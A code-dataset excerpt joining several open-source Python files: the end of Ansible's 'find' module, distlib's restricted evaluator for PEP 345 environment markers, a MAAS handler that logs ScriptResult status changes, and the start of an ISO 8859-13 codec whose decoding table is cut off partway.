requirements: []
description:
- Return a list of files based on specific criteria. Multiple criteria are AND'd together.
options:
age:
required: false
default: null
description:
- Select files whose age is equal to or greater than the specified time.
Use a negative age to find files equal to or less than the specified time.
You can choose seconds, minutes, hours, days, or weeks by specifying the
first letter of any of those words (e.g., "1w").
patterns:
required: false
default: '*'
description:
- One or more (shell or regex) patterns, which type is controlled by C(use_regex) option.
- The patterns restrict the list of files to be returned to those whose basenames match at
least one of the patterns specified. Multiple patterns can be specified using a list.
aliases: ['pattern']
contains:
required: false
default: null
description:
- One or more regex patterns which should be matched against the file content
paths:
required: true
aliases: [ "name", "path" ]
description:
- List of paths of directories to search. All paths must be fully qualified.
file_type:
required: false
description:
- Type of file to select
- The 'link' and 'any' choices were added in version 2.3
choices: [ "file", "directory", "link", "any" ]
default: "file"
recurse:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- If target is a directory, recursively descend into the directory looking for files.
size:
required: false
default: null
description:
- Select files whose size is equal to or greater than the specified size.
Use a negative size to find files equal to or less than the specified size.
Unqualified values are in bytes, but b, k, m, g, and t can be appended to specify
bytes, kilobytes, megabytes, gigabytes, and terabytes, respectively.
Size is not evaluated for directories.
age_stamp:
required: false
default: "mtime"
choices: [ "atime", "mtime", "ctime" ]
description:
- Choose the file property against which we compare age. Default is mtime.
hidden:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to include hidden files, otherwise they'll be ignored.
follow:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to follow symlinks in path for systems with python 2.6+
get_checksum:
required: false
default: "False"
choices: [ True, False ]
description:
- Set this to true to retrieve a file's sha1 checksum
use_regex:
required: false
default: "False"
choices: [ True, False ]
description:
- If false the patterns are file globs (shell) if true they are python regexes
'''
EXAMPLES = r'''
# Recursively find /tmp files older than 2 days
- find:
paths: "/tmp"
age: "2d"
recurse: yes
# Recursively find /tmp files older than 4 weeks and equal or greater than 1 megabyte
- find:
paths: "/tmp"
age: "4w"
size: "1m"
recurse: yes
# Recursively find /var/tmp files with last access time greater than 3600 seconds
- find:
paths: "/var/tmp"
age: "3600"
age_stamp: atime
recurse: yes
# find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz
- find:
paths: "/var/tmp"
patterns: "*.old,*.log.gz"
size: "10m"
# find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz via regex
# Note that yaml double quotes require escaping backslashes but yaml single
# quotes do not.
- find:
paths: "/var/tmp"
patterns: "^.*?\\.(?:old|log\\.gz)$"
size: "10m"
use_regex: True
'''
RETURN = '''
files:
description: all matches found with the specified criteria (see stat module for full output of each dictionary)
returned: success
type: list of dictionaries
sample: [
{ path: "/var/tmp/test1",
mode: "0644",
"...": "...",
checksum: 16fac7be61a6e4591a33ef4b729c5c3302307523
},
{ path: "/var/tmp/test2",
"...": "..."
},
]
matched:
description: number of matches
returned: success
type: string
sample: 14
examined:
description: number of filesystem objects looked at
returned: success
type: string
sample: 34
'''
import os
import stat
import fnmatch
import time
import re
def pfilter(f, patterns=None, use_regex=False):
    '''Return True if name *f* matches any pattern (regex or shell glob).'''
    # No patterns at all means everything passes the filter.
    if patterns is None:
        return True
    if use_regex:
        # re.match anchors at the start of the name, like the original.
        return any(re.compile(p).match(f) for p in patterns)
    return any(fnmatch.fnmatch(f, p) for p in patterns)
def agefilter(st, now, age, timestamp):
    '''Return True if the file passes the age criterion (or age is None).'''
    if age is None:
        return True
    # Elapsed time since the chosen stat field (st_atime/st_mtime/st_ctime).
    elapsed = now - getattr(st, 'st_%s' % timestamp)
    # Positive age: at least that old; negative age: at most that old.
    if age >= 0:
        return elapsed >= abs(age)
    return elapsed <= abs(age)
def sizefilter(st, size):
    '''Return True if the file passes the size criterion (or size is None).'''
    if size is None:
        return True
    # Positive size: at least that big; negative size: at most that big.
    if size >= 0:
        return st.st_size >= abs(size)
    return st.st_size <= abs(size)
def contentfilter(fsname, pattern):
    '''
    Return True if any line of the file at *fsname* matches *pattern*
    (re.match semantics, i.e. anchored at the start of the line).

    A pattern of None disables content filtering and always passes.
    Unreadable files and invalid patterns simply fail the filter (False).
    '''
    if pattern is None:
        return True
    try:
        prog = re.compile(pattern)
        f = open(fsname)
        try:
            for line in f:
                if prog.match(line):
                    return True
        finally:
            # BUG FIX: the original only closed the file on the happy paths,
            # leaking the handle when an error occurred mid-read.
            f.close()
    except Exception:
        # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit are
        # no longer swallowed; any read or regex error still means "no match".
        pass
    return False
def statinfo(st):
    '''Translate an os.stat/os.lstat result into the flat dict find returns.'''
    mode = st.st_mode
    info = {
        'mode': "%04o" % stat.S_IMODE(mode),
        'isdir': stat.S_ISDIR(mode),
        'ischr': stat.S_ISCHR(mode),
        'isblk': stat.S_ISBLK(mode),
        'isreg': stat.S_ISREG(mode),
        'isfifo': stat.S_ISFIFO(mode),
        'islnk': stat.S_ISLNK(mode),
        'issock': stat.S_ISSOCK(mode),
        'uid': st.st_uid,
        'gid': st.st_gid,
        'size': st.st_size,
        'inode': st.st_ino,
        'dev': st.st_dev,
        'nlink': st.st_nlink,
        'atime': st.st_atime,
        'mtime': st.st_mtime,
        'ctime': st.st_ctime,
    }
    # Permission-bit booleans ('wusr' = owner-writable, 'xoth' =
    # world-executable, ...) plus the setuid/setgid flags.
    for key, bit in (
        ('wusr', stat.S_IWUSR), ('rusr', stat.S_IRUSR), ('xusr', stat.S_IXUSR),
        ('wgrp', stat.S_IWGRP), ('rgrp', stat.S_IRGRP), ('xgrp', stat.S_IXGRP),
        ('woth', stat.S_IWOTH), ('roth', stat.S_IROTH), ('xoth', stat.S_IXOTH),
        ('isuid', stat.S_ISUID), ('isgid', stat.S_ISGID),
    ):
        info[key] = bool(mode & bit)
    return info
def main():
    # NOTE(review): AnsibleModule (and, transitively, names such as `sys`
    # used below) are provided by the star import of
    # ansible.module_utils.basic at the bottom of this file; they resolve at
    # call time, after that import has run. Confirm before refactoring.
    module = AnsibleModule(
        argument_spec = dict(
            paths = dict(required=True, aliases=['name','path'], type='list'),
            patterns = dict(default=['*'], type='list', aliases=['pattern']),
            contains = dict(default=None, type='str'),
            file_type = dict(default="file", choices=['file', 'directory', 'link', 'any'], type='str'),
            age = dict(default=None, type='str'),
            age_stamp = dict(default="mtime", choices=['atime','mtime','ctime'], type='str'),
            size = dict(default=None, type='str'),
            recurse = dict(default='no', type='bool'),
            hidden = dict(default="False", type='bool'),
            follow = dict(default="False", type='bool'),
            get_checksum = dict(default="False", type='bool'),
            use_regex = dict(default="False", type='bool'),
        ),
        supports_check_mode=True,
    )

    params = module.params

    filelist = []

    # Convert the human-friendly age ("2d", "-1w", "3600") to signed seconds.
    if params['age'] is None:
        age = None
    else:
        # convert age to seconds:
        m = re.match("^(-?\d+)(s|m|h|d|w)?$", params['age'].lower())
        seconds_per_unit = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
        if m:
            age = int(m.group(1)) * seconds_per_unit.get(m.group(2), 1)
        else:
            module.fail_json(age=params['age'], msg="failed to process age")

    # Convert the human-friendly size ("10m", "-1g", "512") to signed bytes.
    if params['size'] is None:
        size = None
    else:
        # convert size to bytes:
        m = re.match("^(-?\d+)(b|k|m|g|t)?$", params['size'].lower())
        bytes_per_unit = {"b": 1, "k": 1024, "m": 1024**2, "g": 1024**3, "t": 1024**4}
        if m:
            size = int(m.group(1)) * bytes_per_unit.get(m.group(2), 1)
        else:
            module.fail_json(size=params['size'], msg="failed to process size")

    now = time.time()
    msg = ''
    looked = 0
    for npath in params['paths']:
        npath = os.path.expanduser(os.path.expandvars(npath))
        if os.path.isdir(npath):
            ''' ignore followlinks for python version < 2.6 '''
            for root, dirs, files in (sys.version_info < (2,6,0) and os.walk(npath)) or \
                                     os.walk(npath, followlinks=params['follow']):
                looked = looked + len(files) + len(dirs)
                for fsobj in (files + dirs):
                    fsname = os.path.normpath(os.path.join(root, fsobj))

                    # Hidden entries are skipped unless explicitly requested.
                    if os.path.basename(fsname).startswith('.') and not params['hidden']:
                        continue

                    try:
                        st = os.lstat(fsname)
                    except:
                        msg += "%s was skipped as it does not seem to be a valid file or it cannot be accessed\n" % fsname
                        continue

                    r = {'path': fsname}

                    if params['file_type'] == 'any':
                        if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
                            r.update(statinfo(st))
                            filelist.append(r)
                    elif stat.S_ISDIR(st.st_mode) and params['file_type'] == 'directory':
                        if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
                            r.update(statinfo(st))
                            filelist.append(r)
                    elif stat.S_ISREG(st.st_mode) and params['file_type'] == 'file':
                        # Regular files additionally honour the size and
                        # content filters; directories never do.
                        if pfilter(fsobj, params['patterns'], params['use_regex']) and \
                           agefilter(st, now, age, params['age_stamp']) and \
                           sizefilter(st, size) and \
                           contentfilter(fsname, params['contains']):
                            r.update(statinfo(st))
                            if params['get_checksum']:
                                r['checksum'] = module.sha1(fsname)
                            filelist.append(r)
                    elif stat.S_ISLNK(st.st_mode) and params['file_type'] == 'link':
                        if pfilter(fsobj, params['patterns'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
                            r.update(statinfo(st))
                            filelist.append(r)

                # Without recurse, only the top directory level is examined.
                if not params['recurse']:
                    break
        else:
            msg += "%s was skipped as it does not seem to be a valid directory or it cannot be accessed\n" % npath

    matched = len(filelist)
    module.exit_json(files=filelist, changed=False, msg=msg, matched=matched, examined=looked)
# import module snippets
# NOTE(review): this star import must stay below the function definitions and
# above the __main__ guard; it injects AnsibleModule (and related names) that
# main() relies on at call time.
from ansible.module_utils.basic import *

if __name__ == '__main__':
    main()
| gpl-3.0 |
chalasr/Flask-P2P | venv/lib/python2.7/site-packages/pip/_vendor/distlib/markers.py | 1261 | 6282 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""Parser for the environment markers micro-language defined in PEP 345."""
import ast
import os
import sys
import platform
from .compat import python_implementation, string_types
from .util import in_venv
__all__ = ['interpret']
class Evaluator(object):
    """
    A limited evaluator for Python expressions.

    Only the small subset of Python needed by PEP 345 environment markers is
    supported: string literals, names looked up in ``allowed_values`` or a
    user-supplied context, attribute-style dotted names, comparisons and
    boolean operators.  Anything else raises :class:`SyntaxError`.
    """

    # Maps lower-cased AST operator class names to their implementations.
    operators = {
        'eq': lambda x, y: x == y,
        'gt': lambda x, y: x > y,
        'gte': lambda x, y: x >= y,
        'in': lambda x, y: x in y,
        'lt': lambda x, y: x < y,
        'lte': lambda x, y: x <= y,
        'not': lambda x: not x,
        'noteq': lambda x, y: x != y,
        'notin': lambda x, y: x not in y,
    }

    # Environment values a marker is allowed to reference; captured once at
    # class-creation time.
    allowed_values = {
        'sys_platform': sys.platform,
        'python_version': '%s.%s' % sys.version_info[:2],
        # parsing sys.platform is not reliable, but there is no other
        # way to get e.g. 2.7.2+, and the PEP is defined with sys.version
        'python_full_version': sys.version.split(' ', 1)[0],
        'os_name': os.name,
        'platform_in_venv': str(in_venv()),
        'platform_release': platform.release(),
        'platform_version': platform.version(),
        'platform_machine': platform.machine(),
        'platform_python_implementation': python_implementation(),
    }

    def __init__(self, context=None):
        """
        Initialise an instance.

        :param context: If specified, names are looked up in this mapping
                        before falling back to :attr:`allowed_values`.
        """
        self.context = context or {}
        self.source = None

    def get_fragment(self, offset):
        """
        Get the part of the source which is causing a problem, as a repr'd
        snippet of up to 10 characters starting at ``offset``.
        """
        fragment_len = 10
        s = '%r' % (self.source[offset:offset + fragment_len])
        if offset + fragment_len < len(self.source):
            s += '...'
        return s

    def get_handler(self, node_type):
        """
        Get a handler for the specified AST node type, or ``None`` if the
        node type is unsupported.
        """
        return getattr(self, 'do_%s' % node_type, None)

    def evaluate(self, node, filename=None):
        """
        Evaluate a source string or node, using ``filename`` when
        displaying errors.

        :raises SyntaxError: if the source cannot be parsed or contains a
                             construct outside the supported subset.
        """
        if isinstance(node, string_types):
            self.source = node
            kwargs = {'mode': 'eval'}
            if filename:
                kwargs['filename'] = filename
            try:
                node = ast.parse(node, **kwargs)
            except SyntaxError as e:
                s = self.get_fragment(e.offset)
                raise SyntaxError('syntax error %s' % s)
        # Dispatch on the lower-cased AST class name, e.g. ast.BoolOp ->
        # do_boolop.
        node_type = node.__class__.__name__.lower()
        handler = self.get_handler(node_type)
        if handler is None:
            if self.source is None:
                s = '(source not available)'
            else:
                s = self.get_fragment(node.col_offset)
            raise SyntaxError("don't know how to evaluate %r %s" % (
                node_type, s))
        return handler(node)

    def get_attr_key(self, node):
        """Return the dotted-name key (``base.attr``) for an Attribute node."""
        assert isinstance(node, ast.Attribute), 'attribute node expected'
        return '%s.%s' % (node.value.id, node.attr)

    def do_attribute(self, node):
        """
        Resolve a dotted name against the context or the allowed values.
        """
        if not isinstance(node.value, ast.Name):
            # BUG FIX: previously ``key`` was never assigned on this branch,
            # so the ``raise`` below crashed with UnboundLocalError instead
            # of reporting the intended SyntaxError.  Describe the node type
            # in the error message instead.
            key = node.__class__.__name__
            valid = False
        else:
            key = self.get_attr_key(node)
            valid = key in self.context or key in self.allowed_values
        if not valid:
            raise SyntaxError('invalid expression: %s' % key)
        if key in self.context:
            result = self.context[key]
        else:
            result = self.allowed_values[key]
        return result

    def do_boolop(self, node):
        """Evaluate ``and``/``or`` with short-circuiting, like Python."""
        result = self.evaluate(node.values[0])
        is_or = node.op.__class__ is ast.Or
        is_and = node.op.__class__ is ast.And
        assert is_or or is_and
        if (is_and and result) or (is_or and not result):
            for n in node.values[1:]:
                result = self.evaluate(n)
                if (is_or and result) or (is_and and not result):
                    break
        return result

    def do_compare(self, node):
        """Evaluate a (possibly chained) comparison such as ``a < b <= c``."""
        def sanity_check(lhsnode, rhsnode):
            # Comparing two literals is meaningless in a marker, so reject it.
            valid = True
            if isinstance(lhsnode, ast.Str) and isinstance(rhsnode, ast.Str):
                valid = False
            #elif (isinstance(lhsnode, ast.Attribute)
            #      and isinstance(rhsnode, ast.Attribute)):
            #    klhs = self.get_attr_key(lhsnode)
            #    krhs = self.get_attr_key(rhsnode)
            #    valid = klhs != krhs
            if not valid:
                s = self.get_fragment(node.col_offset)
                raise SyntaxError('Invalid comparison: %s' % s)

        lhsnode = node.left
        lhs = self.evaluate(lhsnode)
        result = True
        for op, rhsnode in zip(node.ops, node.comparators):
            sanity_check(lhsnode, rhsnode)
            op = op.__class__.__name__.lower()
            if op not in self.operators:
                raise SyntaxError('unsupported operation: %r' % op)
            rhs = self.evaluate(rhsnode)
            result = self.operators[op](lhs, rhs)
            if not result:
                # Chained comparisons short-circuit on the first failure.
                break
            lhs = rhs
            lhsnode = rhsnode
        return result

    def do_expression(self, node):
        """Unwrap the top-level ast.Expression produced by mode='eval'."""
        return self.evaluate(node.body)

    def do_name(self, node):
        """Resolve a bare name from the context or the allowed values."""
        valid = False
        if node.id in self.context:
            valid = True
            result = self.context[node.id]
        elif node.id in self.allowed_values:
            valid = True
            result = self.allowed_values[node.id]
        if not valid:
            raise SyntaxError('invalid expression: %s' % node.id)
        return result

    def do_str(self, node):
        # NOTE: on Python >= 3.8 string literals parse as ast.Constant and
        # are handled by do_constant below; this remains for older Pythons.
        return node.s

    def do_constant(self, node):
        # Python 3.8+ folds Str/Num literals into ast.Constant; without this
        # handler, markers containing string literals fail on modern Pythons.
        return node.value
def interpret(marker, execution_context=None):
    """
    Interpret a marker and return a result depending on environment.

    :param marker: The marker to interpret.
    :type marker: str
    :param execution_context: The context used for name lookup.
    :type execution_context: mapping
    """
    evaluator = Evaluator(context=execution_context)
    return evaluator.evaluate(marker.strip())
| mit |
maas/maas | src/maasserver/models/signals/scriptresult.py | 1 | 3228 | # Copyright 2019 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Emit ScriptResult status transition event."""
from maasserver.models import Event
from maasserver.preseed import CURTIN_INSTALL_LOG
from maasserver.utils.signals import SignalsManager
from metadataserver.enum import (
RESULT_TYPE,
SCRIPT_STATUS,
SCRIPT_STATUS_CHOICES,
SCRIPT_STATUS_FAILED,
SCRIPT_STATUS_RUNNING,
)
from metadataserver.models.scriptresult import ScriptResult
from provisioningserver.events import EVENT_TYPES
# Module-level manager that registers and toggles the field watchers
# declared at the bottom of this module.
signals = SignalsManager()
def emit_script_result_status_transition_event(
    script_result, old_values, **kwargs
):
    """Send a status transition event.

    Invoked by the SignalsManager whenever a ScriptResult's ``status``
    field changes; ``old_values`` holds the single previous status value.
    """
    [old_status] = old_values

    # Build a human-readable script name, qualified by the block device
    # and/or interface the script ran against, when present.
    blockdevice = script_result.physical_blockdevice
    interface = script_result.interface
    if blockdevice and interface:
        script_name = "%s on %s and %s" % (
            script_result.name,
            blockdevice.name,
            interface.name,
        )
    elif blockdevice:
        script_name = "%s on %s" % (script_result.name, blockdevice.name)
    elif interface:
        script_name = "%s on %s" % (script_result.name, interface.name)
    else:
        script_name = script_result.name

    node = script_result.script_set.node
    new_status = script_result.status

    if (
        script_result.script_set.result_type == RESULT_TYPE.TESTING
        and old_status == SCRIPT_STATUS.PENDING
        and (new_status in SCRIPT_STATUS_RUNNING)
    ):
        # A test just started running.
        Event.objects.create_node_event(
            node,
            EVENT_TYPES.RUNNING_TEST,
            event_description=script_name,
        )
    elif new_status in SCRIPT_STATUS_FAILED.union({SCRIPT_STATUS.ABORTED}):
        # The script failed, timed out, or was aborted.
        Event.objects.create_node_event(
            node,
            EVENT_TYPES.SCRIPT_DID_NOT_COMPLETE,
            event_description="%s %s"
            % (
                script_name,
                SCRIPT_STATUS_CHOICES[new_status][1].lower(),
            ),
        )
    else:
        # Any other transition: report old -> new status by display name.
        old_status_name = None
        new_status_name = None
        for choice_value, choice_name in SCRIPT_STATUS_CHOICES:
            if choice_value == old_status:
                old_status_name = choice_name
            elif choice_value == new_status:
                new_status_name = choice_name
        Event.objects.create_node_event(
            node,
            EVENT_TYPES.SCRIPT_RESULT_CHANGED_STATUS,
            event_description="%s changed status from '%s' to '%s'"
            % (script_name, old_status_name, new_status_name),
        )

    # The install log being produced while the node is no longer netbooting
    # indicates the machine is about to reboot into the installed OS.
    if CURTIN_INSTALL_LOG == script_result.name and not node.netboot:
        Event.objects.create_node_event(node, EVENT_TYPES.REBOOTING)
# Emit a node event whenever a ScriptResult's ``status`` field changes.
# ``delete=False``: deletions do not trigger the handler.
signals.watch_fields(
    emit_script_result_status_transition_event,
    ScriptResult,
    ["status"],
    delete=False,
)

# Enable all signals by default.
signals.enable()
| agpl-3.0 |
ppyordanov/HCI_4_Future_Cities | Server/src/virtualenv/Lib/encodings/iso8859_13.py | 1 | 12597 | """ Python Character Mapping Codec iso8859_13 generated from 'MAPPINGS/ISO8859/8859-13.TXT' with gencodec.py.
""" # "
import codecs
### Codec APIs
class Codec(codecs.Codec):
    """Stateless ISO 8859-13 codec backed by the charmap tables below."""

    def encode(self, input, errors='strict'):
        # charmap_encode returns (bytes, length-consumed).
        return codecs.charmap_encode(input, errors, encoding_table)

    def decode(self, input, errors='strict'):
        # charmap_decode returns (text, length-consumed).
        return codecs.charmap_decode(input, errors, decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
    """Incremental encoder; charmap codecs need no cross-call state."""

    def encode(self, input, final=False):
        # [0] drops the length-consumed part of charmap_encode's result.
        return codecs.charmap_encode(input, self.errors, encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
    """Incremental decoder; charmap codecs need no cross-call state."""

    def decode(self, input, final=False):
        # [0] drops the length-consumed part of charmap_decode's result.
        return codecs.charmap_decode(input, self.errors, decoding_table)[0]
class StreamWriter(Codec, codecs.StreamWriter):
    """Stream writer; all behaviour is inherited from Codec."""
    pass
class StreamReader(Codec, codecs.StreamReader):
    """Stream reader; all behaviour is inherited from Codec."""
    pass
### encodings module API
def getregentry():
    """Return the codecs.CodecInfo registry entry for iso8859-13."""
    # A single stateless Codec instance can serve both directions.
    codec = Codec()
    return codecs.CodecInfo(
        name='iso8859-13',
        encode=codec.encode,
        decode=codec.decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
### Decoding Table
decoding_table = (
u'\x00' # 0x00 -> NULL
u'\x01' # 0x01 -> START OF HEADING
u'\x02' # 0x02 -> START OF TEXT
u'\x03' # 0x03 -> END OF TEXT
u'\x04' # 0x04 -> END OF TRANSMISSION
u'\x05' # 0x05 -> ENQUIRY
u'\x06' # 0x06 -> ACKNOWLEDGE
u'\x07' # 0x07 -> BELL
u'\x08' # 0x08 -> BACKSPACE
u'\t' # 0x09 -> HORIZONTAL TABULATION
u'\n' # 0x0A -> LINE FEED
u'\x0b' # 0x0B -> VERTICAL TABULATION
u'\x0c' # 0x0C -> FORM FEED
u'\r' # 0x0D -> CARRIAGE RETURN
u'\x0e' # 0x0E -> SHIFT OUT
u'\x0f' # 0x0F -> SHIFT IN
u'\x10' # 0x10 -> DATA LINK ESCAPE
u'\x11' # 0x11 -> DEVICE CONTROL ONE
u'\x12' # 0x12 -> DEVICE CONTROL TWO
u'\x13' # 0x13 -> DEVICE CONTROL THREE
u'\x14' # 0x14 -> DEVICE CONTROL FOUR
u'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
u'\x16' # 0x16 -> SYNCHRONOUS IDLE
u'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
u'\x18' # 0x18 -> CANCEL
u'\x19' # 0x19 -> END OF MEDIUM
u'\x1a' # 0x1A -> SUBSTITUTE
u'\x1b' # 0x1B -> ESCAPE
u'\x1c' # 0x1C -> FILE SEPARATOR
u'\x1d' # 0x1D -> GROUP SEPARATOR
u'\x1e' # 0x1E -> RECORD SEPARATOR
u'\x1f' # 0x1F -> UNIT SEPARATOR
u' ' # 0x20 -> SPACE
u'!' # 0x21 -> EXCLAMATION MARK
u'"' # 0x22 -> QUOTATION MARK
u'#' # 0x23 -> NUMBER SIGN
u'$' # 0x24 -> DOLLAR SIGN
u'%' # 0x25 -> PERCENT SIGN
u'&' # 0x26 -> AMPERSAND
u"'" # 0x27 -> APOSTROPHE
u'(' # 0x28 -> LEFT PARENTHESIS
u')' # 0x29 -> RIGHT PARENTHESIS
u'*' # 0x2A -> ASTERISK
u'+' # 0x2B -> PLUS SIGN
u',' # 0x2C -> COMMA
u'-' # 0x2D -> HYPHEN-MINUS
u'.' # 0x2E -> FULL STOP
u'/' # 0x2F -> SOLIDUS
u'0' # 0x30 -> DIGIT ZERO
u'1' # 0x31 -> DIGIT ONE
u'2' # 0x32 -> DIGIT TWO
u'3' # 0x33 -> DIGIT THREE
u'4' # 0x34 -> DIGIT FOUR
u'5' # 0x35 -> DIGIT FIVE
u'6' # 0x36 -> DIGIT SIX
u'7' # 0x37 -> DIGIT SEVEN
u'8' # 0x38 -> DIGIT EIGHT
u'9' # 0x39 -> DIGIT NINE
u':' # 0x3A -> COLON
u';' # 0x3B -> SEMICOLON
u'<' # 0x3C -> LESS-THAN SIGN
u'=' # 0x3D -> EQUALS SIGN
u'>' # 0x3E -> GREATER-THAN SIGN
u'?' # 0x3F -> QUESTION MARK
u'@' # 0x40 -> COMMERCIAL AT
u'A' # 0x41 -> LATIN CAPITAL LETTER A
u'B' # 0x42 -> LATIN CAPITAL LETTER B
u'C' # 0x43 -> LATIN CAPITAL LETTER C
u'D' # 0x44 -> LATIN CAPITAL LETTER D
u'E' # 0x45 -> LATIN CAPITAL LETTER E
u'F' # 0x46 -> LATIN CAPITAL LETTER F
u'G' # 0x47 -> LATIN CAPITAL LETTER G
u'H' # 0x48 -> LATIN CAPITAL LETTER H
u'I' # 0x49 -> LATIN CAPITAL LETTER I
u'J' # 0x4A -> LATIN CAPITAL LETTER J
u'K' # 0x4B -> LATIN CAPITAL LETTER K
u'L' # 0x4C -> LATIN CAPITAL LETTER L
u'M' # 0x4D -> LATIN CAPITAL LETTER M
u'N' # 0x4E -> LATIN CAPITAL LETTER N
u'O' # 0x4F -> LATIN CAPITAL LETTER O
u'P' # 0x50 -> LATIN CAPITAL LETTER P
u'Q' # 0x51 -> LATIN CAPITAL LETTER Q
u'R' # 0x52 -> LATIN CAPITAL LETTER R
u'S' # 0x53 -> LATIN CAPITAL LETTER S
u'T' # 0x54 -> LATIN CAPITAL LETTER T
u'U' # 0x55 -> LATIN CAPITAL LETTER U
u'V' # 0x56 -> LATIN CAPITAL LETTER V
u'W' # 0x57 -> LATIN CAPITAL LETTER W
u'X' # 0x58 -> LATIN CAPITAL LETTER X
u'Y' # 0x59 -> LATIN CAPITAL LETTER Y
u'Z' # 0x5A -> LATIN CAPITAL LETTER Z
u'[' # 0x5B -> LEFT SQUARE BRACKET
u'\\' # 0x5C -> REVERSE SOLIDUS
u']' # 0x5D -> RIGHT SQUARE BRACKET
u'^' # 0x5E -> CIRCUMFLEX ACCENT
u'_' # 0x5F -> LOW LINE
u'`' # 0x60 -> GRAVE ACCENT
u'a' # 0x61 -> LATIN SMALL LETTER A
u'b' # 0x62 -> LATIN SMALL LETTER B
u'c' # 0x63 -> LATIN SMALL LETTER C
u'd' # 0x64 -> LATIN SMALL LETTER D
u'e' # 0x65 -> LATIN SMALL LETTER E
u'f' # 0x66 -> LATIN SMALL LETTER F
u'g' # 0x67 -> LATIN SMALL LETTER G
u'h' # 0x68 -> LATIN SMALL LETTER H
u'i' # 0x69 -> LATIN SMALL LETTER I
u'j' # 0x6A -> LATIN SMALL LETTER J
u'k' # 0x6B -> LATIN SMALL LETTER K
u'l' # 0x6C -> LATIN SMALL LETTER L
u'm' # 0x6D -> LATIN SMALL LETTER M
u'n' # 0x6E -> LATIN SMALL LETTER N
u'o' # 0x6F -> LATIN SMALL LETTER O
u'p' # 0x70 -> LATIN SMALL LETTER P
u'q' # 0x71 -> LATIN SMALL LETTER Q
u'r' # 0x72 -> LATIN SMALL LETTER R
u's' # 0x73 -> LATIN SMALL LETTER S
u't' # 0x74 -> LATIN SMALL LETTER T
u'u' # 0x75 -> LATIN SMALL LETTER U
u'v' # 0x76 -> LATIN SMALL LETTER V
u'w' # 0x77 -> LATIN SMALL LETTER W
u'x' # 0x78 -> LATIN SMALL LETTER X
u'y' # 0x79 -> LATIN SMALL LETTER Y
u'z' # 0x7A -> LATIN SMALL LETTER Z
u'{' # 0x7B -> LEFT CURLY BRACKET
u'|' # 0x7C -> VERTICAL LINE
u'}' # 0x7D -> RIGHT CURLY BRACKET
u'~' # 0x7E -> TILDE
u'\x7f' # 0x7F -> DELETE
u'\x80' # 0x80 -> <control>
u'\x81' # 0x81 -> <control>
u'\x82' # 0x82 -> <control>
u'\x83' # 0x83 -> <control>
u'\x84' # 0x84 -> <control>
u'\x85' # 0x85 -> <control>
u'\x86' # 0x86 -> <control>
u'\x87' # 0x87 -> <control>
u'\x88' # 0x88 -> <control>
u'\x89' # 0x89 -> <control>
u'\x8a' # 0x8A -> <control>
u'\x8b' # 0x8B -> <control>
u'\x8c' # 0x8C -> <control>
u'\x8d' # 0x8D -> <control>
u'\x8e' # 0x8E -> <control>
u'\x8f' # 0x8F -> <control>
u'\x90' # 0x90 -> <control>
u'\x91' # 0x91 -> <control>
u'\x92' # 0x92 -> <control>
u'\x93' # 0x93 -> <control>
u'\x94' # 0x94 -> <control>
u'\x95' # 0x95 -> <control>
u'\x96' # 0x96 -> <control>
u'\x97' # 0x97 -> <control>
u'\x98' # 0x98 -> <control>
u'\x99' # 0x99 -> <control>
u'\x9a' # 0x9A -> <control>
u'\x9b' # 0x9B -> <control>
u'\x9c' # 0x9C -> <control>
u'\x9d' # 0x9D -> <control>
u'\x9e' # 0x9E -> <control>
u'\x9f' # 0x9F -> <control>
u'\xa0' # 0xA0 -> NO-BREAK SPACE
u'\u201d' # 0xA1 -> RIGHT DOUBLE QUOTATION MARK
u'\xa2' # 0xA2 -> CENT SIGN
u'\xa3' # 0xA3 -> POUND SIGN
u'\xa4' # 0xA4 -> CURRENCY SIGN
u'\u201e' # 0xA5 -> DOUBLE LOW-9 QUOTATION MARK
u'\xa6' # 0xA6 -> BROKEN BAR
u'\xa7' # 0xA7 -> SECTION SIGN
u'\xd8' # 0xA8 -> LATIN CAPITAL LETTER O WITH STROKE
u'\xa9' # 0xA9 -> COPYRIGHT SIGN
u'\u0156' # 0xAA -> LATIN CAPITAL LETTER R WITH CEDILLA
u'\xab' # 0xAB -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xac' # 0xAC -> NOT SIGN
u'\xad' # 0xAD -> SOFT HYPHEN
u'\xae' # 0xAE -> REGISTERED SIGN
u'\xc6' # 0xAF -> LATIN CAPITAL LETTER AE
u'\xb0' # 0xB0 -> DEGREE SIGN
u'\xb1' # 0xB1 -> PLUS-MINUS SIGN
u'\xb2' # 0xB2 -> SUPERSCRIPT TWO
u'\xb3' # 0xB3 -> SUPERSCRIPT THREE
u'\u201c' # 0xB4 -> LEFT DOUBLE QUOTATION MARK
u'\xb5' # 0xB5 -> MICRO SIGN
u'\xb6' # 0xB6 -> PILCROW SIGN
u'\xb7' # 0xB7 -> MIDDLE DOT
u'\xf8' # 0xB8 -> LATIN SMALL LETTER O WITH STROKE
u'\xb9' # 0xB9 -> SUPERSCRIPT ONE
u'\u0157' # 0xBA -> LATIN SMALL LETTER R WITH CEDILLA
u'\xbb' # 0xBB -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
u'\xbc' # 0xBC -> VULGAR FRACTION ONE QUARTER
u'\xbd' # 0xBD -> VULGAR FRACTION ONE HALF
u'\xbe' # 0xBE -> VULGAR FRACTION THREE QUARTERS
